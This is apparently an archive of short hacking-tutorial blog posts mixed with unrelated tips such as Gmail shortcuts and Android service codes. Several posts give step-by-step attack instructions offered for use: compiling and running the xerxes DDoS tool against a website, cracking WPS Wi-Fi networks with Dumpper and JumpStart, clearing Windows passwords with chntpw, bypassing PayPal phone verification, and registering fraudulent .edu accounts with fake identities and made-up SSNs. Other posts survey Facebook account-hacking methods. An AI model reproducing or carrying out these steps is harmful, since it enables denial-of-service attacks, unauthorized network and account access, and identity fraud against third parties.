Uncategorized

HOW TO REMOVE A WINDOWS PASSWORD WITH A LINUX LIVE CD

HOW TO REMOVE A WINDOWS PASSWORD WITH A LINUX LIVE CD
HOW TO REMOVE A WINDOWS PASSWORD WITH A LINUX LIVE CD
Back when I was a Windows user 😅, I know I\’m not the only one who has experienced password loss—that moment where you just can\’t remember your password. Sometimes it happens to the best of us. 
So, how can we get into the system without paying a local geek or geeksquad to do it?
 First, we have to look into how Windows stores their passwords.
When Windows saves your user passwords, it stores them in a SAM file. It stores users\’ passwords in a hashed format (in LM hash and NTLM hash).
 Since a hash function is one-way, this provides some measure of security for the storage of the passwords. However, this can still be bruteforced.😅
Some time ago there was an exploit that allowed you to delete the SAM file and log into any account without a password. This is fixed, since Windows no longer allows access to the SAM file while Windows is running. For this we are going to use a Linux Live CD to remove a Windows password using the chntpw tool.
Requirements
BackTrack 5 on a DVD, or a Linux install with chntpw
A password on a Windows installation
STEP 1 BOOT FROM BACKTRACK
Text in bold is a terminal command.
1.Put the disc in your computer.
2.Hit the the setup button.
3.Change CD/DVD to be first on the boot order.
4.Exit the setup and save your settings.
5.When you get to the console, boot with;
 user:root paswword:toor.
6.Boot into the KDE desktop environment:
    startx
7.Open a terminal.
STEP 2 MOUNT DRIVE & CHANGE WINDOWS PASSWORD
Now we have to mount the Windows drive partition to modify the password, or remove it completely.
First, we have to mount the hard drive partition that the Windows installation is located on..
    mount /dev/sda1 /mnt/
2.Change to the directory that the SAM file is in so that we can prepare to modify its contents.
    cd /mnt//Windows/System32/config
3.List the users on the computer contained in the SAM file.
  chntpw -l SAM
4.Change a specific user account password.
    chntpw -u USERNAME SAM
5.Now, lets unmount the drive and boot from Windows to use the updated or cleared password😁.
    umount /dev/sda1
Uncategorized

5 Common Mistakes That Fresh Hackers Make

 5 Common Mistakes That Fresh Hackers Make
Starting out as a beginner in hacking can be a lot of fun, but there are some common mistakes that most make. If you’re reading this, then you have the unique advantage of avoiding these mistakes when you’re still news. The following five points will tell you what not to do in your journey towards becoming a true hacker.
1. If you see a website offering hacking software or offering to hack email ids for money, avoid them. These websites are nothing but scams and won’t work.
2. A software that claims to hack giants like Google, Facebook, Yahoo and the like is a hoax. There are no such software available. You may get yourself hacked while trying to get these.
3. Don’t use keyloggers and Trojans found as freeware online. These software aren’t meant to be free and you will be giving access to your own computer to another hacker.
4. Programming and scripting languages are very important parts of any hacker’s arsenal. If you plan to use software only then you would also be limited by the software’s functionalities.
5. A good hacker is a good programmer, security expert, developer and good script writer. It is usually not the other way around. You must known this for cross site scripting like P(Pishing)
So, hacking is not simply about making your way into websites and leaving your mark. You have a great set of talents a can also get the best jobs in the industry.
Uncategorized

How to Use Your Own Handwriting as System Font in Android

 How to Use Your Own Handwriting as System Font in Android 
 The method is quite simple and easy and you will first have to create the font of your handwriting and then set that fonts to your device. So follow up the below steps to proceed.
 Steps To Use Your Own Handwriting as System Font in Android:
1 First of all you need to visit the website http://www.myscriptfont.com/.
2 In this website you need to download the template as Pdfor Png and Print It
3 Now fill the form using the black pen and then you need to scan the page in (600x300dpi).
4 Even you can use the cool app CamScanner that will make no need of scanner to scan the document.
5 Now upload the scanned document and give any name to your font
6 Now simply click on start button and you need to wait till it generates .tif file and you need to download that file and place it in your sdcard.
7 Now you need a rooted android and if your don’t have then simply follow the Guide to Root Android.
8 In your rooted android download the app iFont(Expert of Fonts).
9 Now simply click on “My Font” Ttab there and then click on “Click This“,
10 Now simply navigate to location to your .tif file and then simply click on set option there and then the process will start.
 Thats it you are done, now the font will get set to your android, enjoy the cool font on your device.
So this is all about How to Use Your Own Handwriting as System Font in Android. Use the guide and simply set the cool font of your handwriting on your android device.
Uncategorized

How to perform DDoS attack in mobile using xerxes via termuxHy friends

How to perform DDoS attack in mobile using xerxes via termux
Hy friends,
             Welcome back to my blog again. I am Chucky Riley Carter the admin of this blog. Today i am going to tell you that how you can perform DDoS attack in mobile using xerxes via termux app. For this we will use termux which is a terminal emulator and also the small version of linux.
 
What Is Termux :
From the website of termux, it is a terminal emulator and also the small version of linux, which is compatible for smartphones. 
     With termux you can run a small linux environment on your android device. 
Basic Needs :
 
1 – You must have an android device which have android version of 5.0 (lollipop ) or above. 
2 – Termux app ( you can easily find this from play store by just typing termux )
3 – Hacker\’s keyboard ( it is also available in play store )
4 – And the most necessary thing is patience and brain. 
5 – Don\’t do spelling mistakes 
How To Install :
 
1 – To install termux in your android device , first turn on your mobile data and go to play store. Search termux and download it from there. 
2 – Now open the termux app and update it by typing the below command.
[ pkg update ]
3 – Now upgrade it by typing the below command.
[ pkg upgrade ]
4 – To ru xerxes in termux we need the git package and clang package.
5 – To install the git package type the below command.
[ pkg install git ]
 
6 – Now we will install clang package. To install clang package type and run the below command
 [ pkg install clang ]
7 – after installing the above two packages now clone the github file of xerxes to install xerxes in termux. To clone the github file of xerxes run the below command.
8 – After some time it will be cloned to termux. After successfully installing xerxes type the below command to see the all file list.
[ ls ]
 
9 – Now type the below command to go to the current directory of xerxes.
[ cd xerxes ]
10 – After going to the current directory of xerxes type and run the below command to see the all lists of xerxes.
[ ls ]
11 – Now type and run below command to decompile the xerxes.c file
[ clang xerxes.c -o xerxes ]
12 – Thats all the xerxes package is now ready to use.
How To Run :
 
1 – To run the xerxes file in termux now type the below command to perform the DDoS attack .
 [ ./xerxes http://www.website.com 80 ]
2 – To perform a strong DDoS attack ,open multiple terminals and run the above command multiple times.
Precaution :
1 – During the whole process of installing xerxes in termux make sure that you are connected to the internet. 
2 – Don\’t do spelling mistakes , Otherwise your command won\’t run properly. 
3 – Stay calm and composed so that you can solve all the problems you are facing in termux.
Uncategorized

WHAT IS FOOTPRINTING?

👣WHAT IS FOOTPRINTING?👣 

The systematic and methodical footprinting of an organization enables attackers to create  
a near complete profile of an organization’s security posture. Using a combination of  
tools and techniques coupled with a healthy dose of patience and mind-melding,  
attackers can take an unknown entity and reduce it to a specific range of domain names,  
network blocks, subnets, routers, and individual IP addresses of systems directly  
connected to the Internet, as well as many other details pertaining to its security posture.  
Although there are many types of footprinting techniques, they are primarily aimed at  
discovering information related to the following environments: Internet, intranet, remote  
access, and extranet. Table 1-1 lists these environments and the critical information an  
attacker will try to identify.
👣WHY IS FOOTPRINTING NECESSARY? 
Footprinting is necessary for one basic reason: it gives you a picture of what the hacker  
sees. And if you know what the hacker sees, you know what potential security exposures  
you have in your environment. And when you know what exposures you have, you  
know how to prevent exploitation. 
Hackers are very good at one thing: getting inside your head, and you don’t even know  
it. They are systematic and methodical in gathering all pieces of information related to  
the technologies used in your environment. Without a sound methodology for performing  
this type of reconnaissance yourself, you are likely to miss key pieces of information  
related to a specific technology or organization—but trust me, the hacker won’t. 
Be forewarned, however, footprinting is often the most arduous task of trying to  
determine the security posture of an entity; and it tends to be the most boring for freshly  
minted security professionals eager to cut their teeth on some test hacking. However,  
footprinting is one of the most important steps and it must be performed accurately and  
in a controlled fashion.
I will post on \”how to perform footprinting\” so stay tunned
Uncategorized

HOW TO GET HQ PROXIES FOR FREE!

HOW TO GET HQ PROXIES FOR FREE!

Hey guys
Exploit hacker is back with new unique tutorial 
2. Create an account or log in with a Google Account
3. Go to the sidebar and click on \”Proxy\”
4. Click on IP authentication
5. Copy and Paste your IP Address into the IP Authorization Box and Click Save Changes Button at the Bottom
6. Click on the Proxy tab again and then click on \”List\”
7. On the top there will be 3 settings, Proxy Country, Authentication Method, and Proxy list mode
8. Choose w/e Proxy Country you want but on Authentication Method make sure its put to IP Authentication and No-Gap Assignment for the Proxy List Mode
9. Click on Download Proxy List on the left of the Proxy List Mode Setting
10. Now you have HQ proxies that get ~1K CPM
ησтєѕ: ιƒ уσυ υѕє тнєѕє ση α νρѕ σя αησтнєя ¢σмρυтєя мαкє ѕυяє тнαт ιρ ιѕ ιη тнє ιρ αυтнєηтι¢αтιση ℓιѕт тσσ σя єℓѕє тнє ρяσχιєѕ ωιℓℓ ησт ωσяк
Uncategorized

Hidden Codes for Androids

Hidden Codes for Android
*#06#-IMEI number 
the
*#0*#-Enter the service menu 
*#*#4636#*#*-Phone information, usage statistics and battery 
*#*#34971539#*#*-Detailed camera information 
*#*#273282*255*663282*#*#*-Immediate backup of all media files 
*#*#197328640#*#*-Enable test mode for service 
*#*#232339#*#*-Wireless LAN tests 
*#*#0842#*#*-Backlight/vibration test 
*#*#2664#*#*-Test the touch screen 
*#*#1111#*#*-FTA software version (1234 in the same code will give PDA and Firmware version) 
*#12580*369#-Software and hardware info 
*#9090#-Diagnostic configuration
 
*#872564#-USB logging control 
*#9900#-System dump mode 
*#301279#-HSDPA/HSUPA Control Menu
*#7465625#-View phone lock status 
*#*#7780#*#*-Reset the/data partition to factory state 
*2767*3855#-Format device to factory state (will delete everything on the phone) 
##7764726-Hidden service
Uncategorized

Here is the complete list of Gmail keyboard shortcuts

Here is the complete list of Gmail keyboard shortcuts:

Compose and Chat
+ : Focus main window
: Focus latest chat or compose
+ . : Advance to next chat or compose
+ , : Advance to previous chat or compose
+ : Send
+ + c : Add cc recipients
+ + b : Add bcc recipients
+ + f : Access custom from
+ k : Insert a link
+ ; : Go to previous misspelled word
+ \’ : Go to next misspelled word
+ m : Open spelling suggestions
Formatting
+ + 5 : Previous font
+ + 6 : Next font
+ + – : Decrease text size
+ + + : Increase text size
+ b : Bold
+ i : Italics
+ u : Underline
+ + 7 : Numbered list
+ + 8 : Bulleted list
+ + 9 : Quote
+ [ : Indent less
+ ] : Indent more
+ + l : Align left
+ + e : Align center
+ + r : Align right
+ + , : Set right-to-left
+ + . : Set left-to-right
+ \\ : Remove formatting
Jumping
g then i : Go to Inbox
g then s : Go to Starred conversations
g then t : Go to Sent messages
g then d : Go to Drafts
g then a : Go to All mail
g then c : Go to Contacts
g then k : Go to Tasks
g then l : Go to Label
Threadlist selection
* then a : Select all conversations
* then n : Deselect all conversations
* then r : Select read conversations
* then u : Select unread conversations
* then s : Select starred conversations
* then t : Select unstarred conversations
Navigation
u : Back to threadlist
k / j : Newer/older conversation
o or : Open conversation; collapse/expand conversation
p / n : Read previous/next message
` : Go to next inbox section
~ : Go to previous inbox section
Application
c : Compose
d : Compose in a tab (new compose only)
/ : Search mail
q : Search chat contacts
. : Open \”more actions\” menu
v : Open \”move to\” menu
l : Open \”label as\” menu
? : Open keyboard shortcut help
Actions
, : Move focus to toolbar
x : Select conversation
s : Rotate superstar
y : Remove label
e : Archive
m : Mute conversation
! : Report as spam
# : Delete
r : Reply
+ r : Reply in a new window
a : Reply all
+ a : Reply all in a new window
f : Forward
+ f : Forward in a new window
+ n : Update conversation
] / [ :  Remove conversation from current view and go previous/next
} / { : Archive conversation and go previous/next
z : Undo last action
+ i : Mark as read
+ u : Mark as unread
_ : Mark unread from the selected message
+ or = : Mark as important
– : Mark as not important
+ t : Add conversation to Tasks
Uncategorized

What Is a Trojan?

What Is A Trojan? 

━━━━━━━━━━━━━
A Trojan horse, or Trojan, is a type of malicious code or software that looks legitimate but can take control of your computer. A Trojan is designed to damage, disrupt, steal, or in general inflict some other harmful action on your data or network.
A Trojan acts like a bona fide application or file to trick you. It seeks to deceive you into loading and executing the malware on your device. Once installed, a Trojan can perform the action it was designed for.
A Trojan is sometimes called a Trojan virus or a Trojan horse virus, but that’s a misnomer. Viruses can execute and replicate themselves. A Trojan cannot. A user has to execute Trojans. Even so, Trojan malware and Trojan virus are often used interchangeably.
Whether you prefer calling it Trojan malware or a Trojan virus, it’s smart to know how this infiltrator works and what you can do to keep your devices safe.
━━━━━━━━━━━━━
Uncategorized

HOW TO HACK WPA/WAP2 – WPS NETWORKS IN WINDOWS

HOW TO HACK WPA/WAP2 – WPS NETWORKS IN WINDOWS

LIMITATIONS:-
1] This Hack works on Wpa/Wpa2 – Wps Unlocked Networks only
2] Does not work on all Routers & all encryption\’s, so cannot hack all the wifi networks Available near you. At least this method can’t.
3] Not all Networks or routers can be hacked using this method
REQUIREMENTS:-
1] Laptop or USB wifi Adapter
2] Windows Operating System
3]  Wincap
4] JumStart
5] Dumpper
6] NetFrameWork 4.5
7] Wpa/Wpa2 – WPS Networks Available with at least 8% signal
LINK TO DOWNLOAD:-
(Note:- install above softwares one by one, even one of the Installation is wrong there will be many problems & errors in next process)
STEPS:-
1] After Downloading and Installing all the Software’s Open Dumper (No need of Installing Dumper, whenever you are interested in hacking, all you need to do is  open Dumpper )
2] Select your Network Adapter Now Click on “Scan”, There you can see all the available Wifi Networks
3] Now Move on to the “WPS” Tab
4] Select “All networks”
5] Now click on “Scan”
6] Select a Network That You Want Hack
7] Now Click On Start JumpStart
8] JumpStart Will Automatically Start The Process And Complete The Hack
9] Now The Hack is Completed, You are already connected to the network that you Hacked
10] Click on “Profiles” to see the Details and Passwords of the wifi Networks That You Hacked
11] Select  a Network and There you can find  the details and passwords of the networks that you hacked
12] There is another method to see the password of the network that you hacked
13] Right click on the Networks and select “Open Network and Sharing Center”
14] Now click on the “Connection: Network Name”
15] Then the Properties of the Connected Network Will Appear, Now select “Wireless Properties”
16] Now move to “Security” tab
17] Mark On “Show Characters” and the Password of the Wifi Network is Shown 
This is how a Wifi WPA/WPA2-WPS Network is hacked.
Uncategorized

Method To Get Free Facebook Followers

 Method to get Free Facebook followers 
1. Go to wefbee.com
2. Select auto friend request.
3. Then scroll down and click on the get token button.
4. Then login to your facebook account.
5. A token will be generated so copy paste the contents in the green box and paste it as you will be directed then submit.
6. You\’ll be directed to homepage where you will select auto friend request then tap on auto request hyperlink.
From there you will start receiving so many friend requests on your account but they will in turn be converted into followers.
Uncategorized

TERMUX BASIC PACKAGES BY RAYLESSBLOGGERS

TERMUX BASIC PACKAGES BY RAYLESSBLOGGERS
————————————————-
  pkg update -y
pkg upgrade -y
 pkg install python -y
pkg install python2 -y
 pkg install python2-dev -y
pkg install python3 -y
pkg install java -y
 pkg install fish -y
 pkg install ruby -y
pkg install help -y
pkg install git -y
pkg install host -y
pkg install php -y
 pkg install perl -y
pkg install nmap -y
 pkg install bash -y
pkg install clang -y
 pkg install nano -y
pkg install w3m -y
 pkg install havij -y
pkg install hydra -y
pkg install figlet -y
pkg install cowsay -y
pkg install curl -y
 pkg install tar -y
pkg install zip -y
pkg install unzip -y
pkg install tor -y
pkg install google -y
 pkg install sudo -y
 pkg install wget -y
pkg install wireshark -y
 pkg install wgetrc -y 
pkg install wcalc -y
pkg install bmon -y
pkg install vpn -y
pkg install unrar -y
 pkg install toilet -y
pkg install proot -y
pkg install net-tools -y
pkg install golang -y
pkg install chroot -y
termux-chroot -y
pkg install macchanger -y
pkg install openssl -y
pkg install cmatrix -y
pkg install openssh -y
 pkg install wireshark -y
termux-setup-storage -y
pkg install macchanger -y
apt update && apt upgrade -y
Uncategorized

How to Generate Proxy Using Android Phone / Termux

How to Generate Proxy Using Android Phone / Termux

Unlimited Proxy Generator Tool In Termux
Open Termux 
                        (Tap to copy Command)
$ apt update
$ apt install python2 
$ pkg install python2
[%] Download This Zip file And Save Your Download Folder and Open Termux [%]
$  cd /sdcard
$  cd Download       (Choose Your Download File Location)
$  unzip proxy-generator-master.zip
$  cd proxy-generator-master
$  pip2 install requests 
$  python2 proxy.py
Uncategorized

5 BEST WIFI HACKING TOOLS

5 BEST WIFI HACKING TOOLS
1. AirSnort
AirSnort is another popular tool for decrypting WEP encryption on a wi-fi 802.11b network. It is a free tool and comes with Linux and Windows platforms. This tool is no longer maintained, but it is still available to download from Sourceforge. AirSnort works by passively monitoring transmissions and computing encryption keys once it has enough packets received. This tool is simple to use. If you are interested, you can try this tool to crack WEP passwords.
 
2. Cain & Able
Cain & Able is a popular password cracking tool. This tool is developed to intercept network traffic and then discover passwords by bruteforcing the password using cryptanalysis attack methods. It can also recover wireless network keys by analyzing routing protocols. It you are trying to learn wireless security and password cracking, you should once try this tool.
 
3. Kismet
Kismet is the wi-fi 802.11 a/b/g/n layer2 wireless network sniffer and IDS. It works with any wi-fi card which supports rfmon mode. It passively collects packets to identify networks and detect hidden networks. It is built on client/server modular architecture. It is available for Linux, OSX, Windows and BSD platforms.
 
4. Airjack
Airjack is a Wi-Fi 802.11 packet injection tool. This wireless cracking tool is very useful in injecting forged packets and making a network down by denial of service attack. This tool can also be used for a man in the middle attack in the network.
 
5. WepAttack
WepAttack is an open source Linux tool for breaking 802.11 WEP keys. This tool performs an active dictionary attack by testing millions of words to find the working key. Only a working WLAN card is required to work with WepAttack.
Uncategorized

List Of Terms Used In The Field Of Hacking

List of terms used in the field of hacking.

1 Adware − Adware is software designed to force pre-chosen ads to display on your system.
2 Attack − An attack is an action that is done on a system to get its access and extract sensitive data.
3 Back door − A back door, or trap door, is a hidden entry to a computing device or software that bypasses security measures, such as logins and password protections.
4 Bot − A bot is a program that automates an action so that it can be done repeatedly at a much higher rate for a more sustained period than a human operator could do it. For example, sending HTTP, FTP or Telnet at a higher rate or calling script to create objects at a higher rate.
5 Botnet − A botnet, also known as zombie army, is a group of computers controlled without their owners’ knowledge. Botnets are used to send spam or make denial of service attacks.
6 Brute force attack − A brute force attack is an automated and the simplest kind of method to gain access to a system or website. It tries different combination of usernames and passwords, over and over again, until it gets in.
7 Buffer Overflow − Buffer Overflow is a flaw that occurs when more data is written to a block of memory, or buffer, than the buffer is allocated to hold.
8 Clone phishing − Clone phishing is the modification of an existing, legitimate email with a false link to trick the recipient into providing personal information.
9 Cracker − A cracker is one who modifies the software to access the features which are considered undesirable by the person cracking the software, especially copy protection features.
10 Denial of service attack (DoS) − A denial of service (DoS) attack is a malicious attempt to make a server or a network resource unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet.
11 DDoS − Distributed denial of service attack.
12 Exploit Kit − An exploit kit is software system designed to run on web servers, with the purpose of identifying software vulnerabilities in client machines communicating with it and exploiting discovered vulnerabilities to upload and execute malicious code on the client.
13 Exploit − Exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to compromise the security of a computer or network system.
14 Firewall − A firewall is a filter designed to keep unwanted intruders outside a computer system or network while allowing safe communication between systems and users on the inside of the firewall.
15 Keystroke logging − Keystroke logging is the process of tracking the keys which are pressed on a computer (and which touchscreen points are used). It is simply the map of a computer/human interface. It is used by gray and black hat hackers to record login IDs and passwords. Keyloggers are usually secreted onto a device using a Trojan delivered by a phishing email.
16 Logic bomb − A virus secreted into a system that triggers a malicious action when certain conditions are met. The most common version is the time bomb.
17 Malware − Malware is an umbrella term used to refer to a variety of forms of hostile or intrusive software, including computer viruses, worms, Trojan horses, ransomware, spyware, adware, scareware, and other malicious programs.
18 Master Program − A master program is the program a black hat hacker uses to remotely transmit commands to infected zombie drones, normally to carry out Denial of Service attacks or spam attacks.
19 Phishing − Phishing is an e-mail fraud method in which the perpetrator sends out legitimate-looking emails, in an attempt to gather personal and financial information from recipients.
20 Phreaker − Phreakers are considered the original computer hackers and they are those who break into the telephone network illegally, typically to make free longdistance phone calls or to tap phone lines.
Uncategorized

How to Install and Run Kali Linux on any Android Smartphone

How to Install and Run Kali Linux on any Android Smartphone

Steps To Install Kali Linux On Any Android:
1. First of all download and install Linux Deploy App in your android from the Google Play Store.
2. Now After downloading and installing it launch the app in your device and there tap on download button. 
3. Now there tap on Distribution option and change it to Kali Linux instead of Linux.
4. Now scroll up and click on the Install button at the top of  there.
5. Now wait for the download to complete time taken can be vary depending upon your internet speed.
6. Now download and install VNC Viewer App in your android from the Play Store.
7. Now launch the app and fill up the settings as displayed on the screenshot below. 
8. Now click on Connect button there.
9. Thats it you are done, Now Kali linux gets installed in your android and you can enjoy the dummy hacking environment in your android
Uncategorized

Different Type Of Hackers

Different Type Of Hackers 
━━━━━━━━━━━━━
 White Hat Hacker
━━━━━━━━━━━━━
First up, we have the perfect type of hacker to break the stereotype. The white hat hacker is a good guy, as ironic as it may sound. White Hackers, white hat hackers or ethical hackers are the people who test existing internet infrastructures to research loopholes in the system. They create algorithms and perform multiple methodologies to break into systems, only to strengthen them.
Think of this as a lockpick, who would work his way around locks, only to inform the owners of how to make the locks work better.
Famous white hat hackers have historically been pivotal in ensuring that large corporations maintain a strong network framework so that it is unbreakable against all other types of hacking. From being employees of the Government to being private consultants, white hackers help internet be a better and safer place.
 Black Hat Hacker
━━━━━━━━━━━━━
Simply put, these are the bad guys. Black hat hackers are responsible for all that is wrong with hacking. These guys break into systems purely with negative intentions. From stealing credit card information, to altering public databases, a black hat hacker looks to gain fame or monetary benefits from exploiting the loopholes in internet frameworks. Famous black hat hackers have notoriously robbed banks and financial institutions of millions of dollars, and invaluable private data.
 Grey Hat Hacker
━━━━━━━━━━━━━
A grey hat hacker usually has mixed intentions. As the color code implies, this hacker type does not have the good intentions of a white hat hacker, nor does he have the ill intentions of a black hacker. A grey hat would break into systems but never for his own benefit. Famous grey hat hackers have exploited systems only to make the information public, and to bring to limelight vast datasets of information that contains wrongdoings.
━━━━━━━━━━━━━
Uncategorized

Paypal Phone Vertification Bypass Method

Paypal Phone Vertification Bypass Method
1. Open Paypal In Normal Chrome And Incognito (Ctrl + Shift + N)
2. Put The Both Information In Chrome And Incognito (Put The Email And Pass)
3. Then Do This Fast , LOG IN Faster Both Then The Data Will
Encrypt So One Of The Chrome Or Incognito Will Get Log In And One Will Get Phone Vertification
Note :- You Have To Open Two Tabs One is Normal 2nd Incognito
Uncategorized

HOW TO GET .EDU E-MAIL 2020 | FAST & EASY | UNLIMITED E-MAILS

HOW TO GET .EDU E-MAIL 2020 | FAST & EASY | UNLIMITED E-MAILS 
1. (Not 100% necessary) Activate your VPN on the United States
2. Head over to http://apply.vccs.edu
3. Click “Sign up with email”
5. Randomize a United States Identity
6. Head over to https://temp-mail.org and generate an e-mail
7. On the edu apply, fill in the information given on the fake name & temp mail
8. After submitting, press “Continue” & the big red button “Apply Now”
9. Select any College, and then scroll all the way down to “Apply Now”
10. Fill it with the info provided on all pages. ( on the SSN,432-14-“xxxx”, replace the “x” with random numbers)
11. If you get an error about your address, just skip it
12. When you finally submit all the info take a printscreen and save it.
13. Hit “Go to my student account”
14. Make some security questions
15. Go to http://mail.email.vccs.edu and login
16. Done! You now have an edu mail..!
Uncategorized

Top Ways How Hackers Can Hack Facebook Accounts

Top Ways How Hackers Can Hack Facebook Accounts 

Note :-  This post is only for security purpose don\’t try any illigal activity and i\’m just shared these methods because protect our facebook account from these types of hacking attacks.
Mostly Hackers use these methods to hack facebook account 2017, So protect yourself from hackers. Must Read this post, and beware from hackers.
#1 Hack Facebook Account Password By Phishing
Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims \”Email Address\” and \”Password\” is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.
#2 Hack Facebook Account Password By Keylogging
Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim\’s computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.
#3 Stealer\’s
Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer\’s are software\’s specially designed to capture the saved passwords stored in the victims Internet browser.
#4 Hack Facebook Account Password By Session Hijacking
Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.
#5 Sidejacking With Firesheep
Sidejacking attack went common in late 2010, however it\’s still popular now a days. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim is on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it\’s more targeted towards WiFi users.
#6 Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are a lots of Mobile Spying software\’s used to monitor a Cellphone. The most popular Mobile Phone Spying software\’s are: Mobile Spy, and Spy Phone Gold.
#7 DNS Spoofing
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.
#8 USB Hacking
If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.
#9 Man In the Middle Attacks
If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.
#10 Botnets
Botnets are not commonly used for hacking Facebook accounts, because of it\’s high setup costs. They are used to carry more advanced attacks. A Botnet is basically a collection of compromised computer.The infection process is same as the key logging, however a Botnet gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Botnets include Spyeye and Zeus.
Mostly hackers use these methods to hack facebook account password, We